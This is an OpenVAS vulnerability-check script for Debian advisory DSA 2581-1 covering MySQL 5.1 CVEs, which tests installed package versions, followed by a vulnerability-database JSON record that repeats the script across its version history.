Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)
2013-09-18T00:00:00
ID OPENVAS:1361412562310892581 Type openvas Reporter Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net Modified 2019-03-18T00:00:00
Description
Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to a new upstream version,
5.1.66, which includes additional changes, such as performance improvements and
corrections for data loss defects. These changes are described in the
MySQL release notes.
# OpenVAS Vulnerability Test
# $Id: deb_2581_1.nasl 14276 2019-03-18 14:43:56Z cfischer $
# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.892581");
script_version("$Revision: 14276 $");
script_cve_id("CVE-2012-5611", "CVE-2012-3173", "CVE-2012-3150", "CVE-2012-3166", "CVE-2012-3163", "CVE-2012-3167", "CVE-2012-3197", "CVE-2012-3180", "CVE-2012-3160", "CVE-2012-3177", "CVE-2012-3158");
script_name("Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)");
script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $");
script_tag(name:"creation_date", value:"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)");
script_tag(name:"cvss_base", value:"9.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:C/I:C/A:C");
script_xref(name:"URL", value:"http://www.debian.org/security/2012/dsa-2581.html");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB6");
script_tag(name:"affected", value:"mysql-5.1 on Debian Linux");
script_tag(name:"solution", value:"For the testing distribution (wheezy) and unstable distribution (sid), these
problems have been fixed in version 5.5.28+dfsg-1.
Additionally, CVE-2012-5611 has been fixed in this upload. The vulnerability
(discovered independently by Tomas Hoger from the Red Hat Security Response
Team and king cope) is a stack-based buffer overflow in acl_get() when
checking user access to a database. Using a carefully crafted database name, an
already authenticated MySQL user could make the server crash or even execute
arbitrary code as the mysql system user.
For the stable distribution (squeeze), this problem has been fixed in version
5.1.66-0+squeeze1.
For the testing distribution (wheezy) and unstable distribution (sid), this
problem will be fixed soon.
We recommend that you upgrade your mysql-5.1 packages.");
script_tag(name:"summary", value:"Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to a new upstream version,
5.1.66, which includes additional changes, such as performance improvements and
corrections for data loss defects. These changes are described in the
MySQL release notes.");
script_tag(name:"vuldetect", value:"This check tests the installed software version using the apt package manager.");
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
res = "";
report = "";
if((res = isdpkgvuln(pkg:"libmysqlclient-dev", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"libmysqlclient16", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"libmysqld-dev", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"libmysqld-pic", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"mysql-client", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"mysql-client-5.1", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"mysql-common", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"mysql-server", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"mysql-server-5.1", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if((res = isdpkgvuln(pkg:"mysql-server-core-5.1", ver:"5.1.66-0+squeeze1", rls:"DEB6")) != NULL) {
report += res;
}
if(report != "") {
security_message(data:report);
} else if(__pkg_match) {
exit(99);
}
{"id": "OPENVAS:1361412562310892581", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)", "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.", "published": "2013-09-18T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892581", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2012/dsa-2581.html"], "cvelist": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3167", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "type": "openvas", "lastseen": "2019-05-29T18:37:57", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3167", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.", "edition": 3, "enchantments": {"dependencies": {"modified": "2018-09-01T23:56:13", "references": [{"idList": ["DEBIAN:DSA-2581-1:29892"], "type": "debian"}, {"idList": ["OPENSUSE-SU-2013:0156-1", "OPENSUSE-SU-2013:0135-1", "OPENSUSE-SU-2013:0014-1", "OPENSUSE-SU-2013:0011-1", "OPENSUSE-SU-2013:0013-1"], "type": "suse"}, {"idList": ["ELSA-2012-1462", "ELSA-2012-1551"], "type": "oraclelinux"}, {"idList": ["USN-1658-1", "USN-1621-1"], "type": "ubuntu"}, {"idList": ["EDB-ID:23075"], "type": "exploitdb"}, {"idList": ["MYSQL_5_1_64.NASL", "UBUNTU_USN-1621-1.NASL", "MYSQL_5_1_65.NASL", "REDHAT-RHSA-2012-1462.NASL", "SL_20121114_MYSQL_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-1462.NASL", "CENTOS_RHSA-2012-1462.NASL", "DEBIAN_DSA-2581.NASL", "MARIADB_5_5_28.NASL", "MYSQL_5_5_28.NASL"], "type": "nessus"}, {"idList": ["SSV:60545"], "type": "seebug"}, {"idList": ["SOL14907"], "type": "f5"}, {"idList": ["OPENVAS:892581", "OPENVAS:881538", "OPENVAS:1361412562310812190", "OPENVAS:1361412562310803113", "OPENVAS:1361412562310881538", "OPENVAS:1361412562310803112", "OPENVAS:870861", "OPENVAS:1361412562310812192", "OPENVAS:1361412562310803111", "OPENVAS:1361412562310812191"], "type": "openvas"}, {"idList": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "type": "cve"}, {"idList": ["ALAS-2012-145", "ALAS-2012-144"], "type": "amazon"}, {"idList": ["CESA-2012:1551", "CESA-2012:1462"], "type": "centos"}, {"idList": ["PACKETSTORM:118550"], "type": "packetstorm"}, {"idList": ["RHSA-2012:1551", "RHSA-2012:1462"], "type": "redhat"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "4829e86be8be5cf328fb30ce1c0946ef150ae52356961dba3dd23a0246e1a0a4", "hashmap": [{"hash": "0ab63d3b51a6f05e35fdb0f1989bc938", "key": "cvelist"}, {"hash": "45e8ce81b5f3687beb90685650851114", "key": "pluginID"}, {"hash": "6ec3ed5cb876fb3f574cd22b3d3dbb92", "key": "description"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "6d84a31130c53d8702099ffe14b422e2", "key": "references"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "44ab3e7793b30c34f2c3d1055b3bf0f9", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "f4a2955c82206641eaba1c51dd57ed61", "key": "title"}, {"hash": "94c4a7e4814542b0a23cdcf7b13a6b1c", "key": "published"}, {"hash": "4ea840ff73b6affb0ff1787d26923e0e", "key": "cvss"}, {"hash": "794011abc4b4138b6851156385528827", "key": "href"}, {"hash": "5474798d22021d679c1738be31fc4947", "key": "reporter"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892581", "id": "OPENVAS:1361412562310892581", "lastseen": "2018-09-01T23:56:13", "modified": "2018-04-06T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310892581", "published": "2013-09-18T00:00:00", "references": ["http://www.debian.org/security/2012/dsa-2581.html"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2581_1.nasl 9353 2018-04-06 07:14:20Z cfischer $\n# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mysql-5.1 on Debian Linux\";\ntag_insight = \"MySQL is a fast, stable and true multi-user, multi-threaded SQL database\nserver.\";\ntag_solution = \"For the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and king cope) is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\";\ntag_summary = \"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892581\");\n script_version(\"$Revision: 9353 $\");\n script_cve_id(\"CVE-2012-5611\", \"CVE-2012-3173\", \"CVE-2012-3150\", \"CVE-2012-3166\", \"CVE-2012-3163\", \"CVE-2012-3167\", \"CVE-2012-3197\", \"CVE-2012-3180\", \"CVE-2012-3160\", \"CVE-2012-3177\", \"CVE-2012-3158\");\n script_name(\"Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:14:20 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"9.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2012/dsa-2581.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)", "type": "openvas", "viewCount": 5}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2018-09-01T23:56:13"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3167", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4761a9169d94f5806efa820a898b794da31f15f53decf2b5734e5179a420672d", "hashmap": [{"hash": "0ab63d3b51a6f05e35fdb0f1989bc938", "key": "cvelist"}, {"hash": "45e8ce81b5f3687beb90685650851114", "key": "pluginID"}, {"hash": "6ec3ed5cb876fb3f574cd22b3d3dbb92", "key": "description"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "6d84a31130c53d8702099ffe14b422e2", "key": "references"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "44ab3e7793b30c34f2c3d1055b3bf0f9", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "f4a2955c82206641eaba1c51dd57ed61", "key": "title"}, {"hash": "94c4a7e4814542b0a23cdcf7b13a6b1c", "key": "published"}, {"hash": "794011abc4b4138b6851156385528827", "key": "href"}, {"hash": "5474798d22021d679c1738be31fc4947", "key": "reporter"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892581", "id": "OPENVAS:1361412562310892581", "lastseen": "2018-08-30T19:24:32", "modified": "2018-04-06T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310892581", "published": "2013-09-18T00:00:00", "references": ["http://www.debian.org/security/2012/dsa-2581.html"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2581_1.nasl 9353 2018-04-06 07:14:20Z cfischer $\n# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mysql-5.1 on Debian Linux\";\ntag_insight = \"MySQL is a fast, stable and true multi-user, multi-threaded SQL database\nserver.\";\ntag_solution = \"For the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and king cope) is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\";\ntag_summary = \"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892581\");\n script_version(\"$Revision: 9353 $\");\n script_cve_id(\"CVE-2012-5611\", \"CVE-2012-3173\", \"CVE-2012-3150\", \"CVE-2012-3166\", \"CVE-2012-3163\", \"CVE-2012-3167\", \"CVE-2012-3197\", \"CVE-2012-3180\", \"CVE-2012-3160\", \"CVE-2012-3177\", \"CVE-2012-3158\");\n script_name(\"Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:14:20 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"9.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2012/dsa-2581.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.66-0+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)", "type": "openvas", "viewCount": 5}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:24:32"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-3163", "CVE-2012-3166", "CVE-2012-3160", "CVE-2012-3150", "CVE-2012-5611", "CVE-2012-3180", "CVE-2012-3167", "CVE-2012-3197", "CVE-2012-3173", "CVE-2012-3158", "CVE-2012-3177"], "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4829e86be8be5cf328fb30ce1c0946ef150ae52356961dba3dd23a0246e1a0a4", "hashmap": [{"hash": "0ab63d3b51a6f05e35fdb0f1989bc938", "key": "cvelist"}, {"hash": "45e8ce81b5f3687beb90685650851114", "key": "pluginID"}, {"hash": "6ec3ed5cb876fb3f574cd22b3d3dbb92", "key": "description"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "6d84a31130c53d8702099ffe14b422e2", "key": "references"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "44ab3e7793b30c34f2c3d1055b3bf0f9", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "f4a2955c82206641eaba1c51dd57ed61", "key": "title"}, {"hash": "94c4a7e4814542b0a23cdcf7b13a6b1c", "key": "published"}, {"hash": "4ea840ff73b6affb0ff1787d26923e0e", "key": "cvss"}, {"hash": "794011abc4b4138b6851156385528827", "key": "href"}, {"hash": "5474798d22021d679c1738be31fc4947", "key": "reporter"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892581", "id": "OPENVAS:1361412562310892581", "lastseen": "2018-04-06T11:23:39", "modified": "2018-04-06T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310892581", "published": "2013-09-18T00:00:00", "references": ["http://www.debian.org/security/2012/dsa-2581.html"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2581_1.nasl 9353 2018-04-06 07:14:20Z cfischer $\n# Auto-generated from advisory DSA 2581-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mysql-5.1 on Debian Linux\";\ntag_insight = \"MySQL is a fast, stable and true multi-user, multi-threaded SQL database\nserver.\";\ntag_solution = \"For the testing distribution (wheezy) and unstable distribution (sid), these\nproblems have been fixed in version 5.5.28+dfsg-1.\n\nAdditionally, CVE-2012-5611 has been fixed in this upload. The vulnerability\n(discovered independently by Tomas Hoger from the Red Hat Security Response\nTeam and king cope) is a stack-based buffer overflow in acl_get() when\nchecking user access to a database. Using a carefully crafted database name, an\nalready authenticated MySQL user could make the server crash or even execute\narbitrary code as the mysql system user.\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n5.1.66-0+squeeze1.\n\nFor the testing distribution (wheezy) and unstable distribution (sid), this\nproblem will be fixed soon.\n\nWe recommend that you upgrade your mysql-5.1 packages.\";\ntag_summary = \"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to a new upstream version,\n5.1.66, which includes additional changes, such as performance improvements and\ncorrections for data loss defects. These changes are described in the\nMySQL release notes.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892581\");\n script_version(\"$Revision: 9353 $\");\n script_cve_id(\"CVE-2012-5611\", \"CVE-2012-3173\", \"CVE-2012-3150\", \"CVE-2012-3166\", \"CVE-2012-3163\", \"CVE-2012-3167\", \"CVE-2012-3197\", \"CVE-2012-3180\", \"CVE-2012-3160\", \"CVE-2012-3177\", \"CVE-2012-3158\");\n script_name(\"Debian Security Advisory DSA 2581-1 (mysql-5.1 - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:14:20 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"9.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: 